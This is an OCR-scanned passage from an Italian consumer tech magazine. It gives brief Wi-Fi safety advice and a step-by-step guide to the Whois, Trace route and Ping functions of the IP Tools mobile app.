limitarci ad utilizzare le connessioni aperte unicamente per la 
semplice navigazione Web: evitiamo di accedere alla mailbox 
personale e, ancor di più, verifichiamo con regolarità che le por- 
te del nostro PC, smartphone o tablet siano ben blindate! Ma gli 
stessi pericoli corrono sulle reti Wi-Fi dei router Alice, Fastware 
o Vodafone, ad esempio: non è una novità, infatti, che tali reti 
hanno delle password alcune volte facilmente calcolabili da un 
malintenzionato (come abbiamo scoperto nella Cover Story di 
questo mese). Verifichiamo dunque con una certa regolarità gli 
indirizzi IP degli host connessi alla nostra rete locale: IP Tools 
è perfetto anche per fare ciò. 

Ma ora, terminiamo questa breve panoramica dell’app andando 
a scoprire ulteriori strumenti presenti: in pochi tap possiamo ad 
esempio scoprirne di più su qualsiasi dominio Internet attivo, 
verificandone i dati di intestazione o la scadenza. 


IP Tools integra strumenti che ci aiutano a scoprire di più sui domini Web. Ecco come usarli 


SERVIZIO WHOIS 
01 Dal menu princi- 

pale di IP To- 
ols, optiamo per Whois. 
Inseriamo nel primo 
campo il dominio Internet 
che vogliamo verificare e 
selezioniamo da Inserisci 
iltuo server uno di quelli 
presenti (la lista è ab- 
bastanza nutrita - sce- 
gliamone uno qualsiasi). 
Terminiamo con un tap sul 
pulsante Avvia. 


IL TRACE 

ROUTE... 

Ritorniamo al 
menu principale dell'app. 
Selezioniamo questa 
volta la voce Trace route. 
Indichiamo un dominio (ad 
esempio, google.it) e tap- 
piamo sul pulsante Avvia. 
Vengono mostrati tutti i nodi 
per i quali la nostra richie- 
sta passa: questa funziona- 
lità è utile per scoprire i vari 
nodi per i quali la nostra 
richiesta (accesso ad un sito 
Web] passa. 


ECCO LE INFO! 

It servizio Whois 

offre informazio- 
ni aggiuntive sull'intesta- 
zione, la registrazione e la 
scadenza di un dato nome 
a dominio Internet. Così, 
dopo qualche secondo di 
attesa, tutte le informa- 
zioni del dominio ricer- 
cato vengono mostrate 
a schermo (intestatario, 
data di registrazione, data 
di scadenza. 


Inserisci il tu 


«E IL PING 

Spostiamoci in 

Ping (sempre pre- 
sente nel menu principale 
di IP Tools). Indichiamo 
uno degli indirizzi IP 
presenti nella nostra LAN 
{o esterno] e tappiamo 
sul pulsante Avvia. Così, 
potremo verificare gli 
effettivi tempi di rispo- 
sta e valutare eventuali 
problematiche di rete [un 
indirizzo IP non è in grado 
di navigare agevolmente 
sul Web?}). 


